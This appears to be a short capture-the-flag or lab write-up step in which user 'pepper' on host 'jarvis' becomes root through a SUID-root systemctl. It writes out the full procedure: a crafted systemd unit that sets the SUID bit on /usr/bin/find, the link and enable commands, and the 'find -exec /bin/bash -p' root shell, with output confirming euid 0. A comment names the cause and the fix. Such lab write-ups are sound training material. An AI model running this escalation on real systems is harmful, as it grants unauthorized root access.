8 pepper > root

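# Privilege escalation using the SUID bit on systemctl.
# The GTFOBins method ran into issues: the location of the service file did not allow symlink creation.
# Created the service file in /home/pepper instead, which worked.
# Root cause: systemctl is SUID root on this host, so the unit's ExecStart runs as root (the chmod on root-owned /usr/bin/find succeeds below); removing the SUID bit from systemctl closes this path.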

pepper@jarvis:~$ TF=kashz.service
pepper@jarvis:~$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "chmod +s /usr/bin/find"
> [Install]
> WantedBy=multi-user.target' > $TF

pepper@jarvis:~$ /bin/systemctl link /home/pepper/$TF
pepper@jarvis:~$ /bin/systemctl enable --now $TF
Created symlink /etc/systemd/system/multi-user.target.wants/kashz.service -> /home/pepper/kashz.service.


pepper@jarvis:~$ ls -la /usr/bin/find
-rwsr-sr-x 1 root root 221768 Feb 18  2017 /usr/bin/find
pepper@jarvis:~$ find . -exec /bin/bash -p \; -quit
bash-4.4# whoami;id;hostname
root
uid=1000(pepper) gid=1000(pepper) euid=0(root) egid=0(root) groups=0(root),1000(pepper)
jarvis
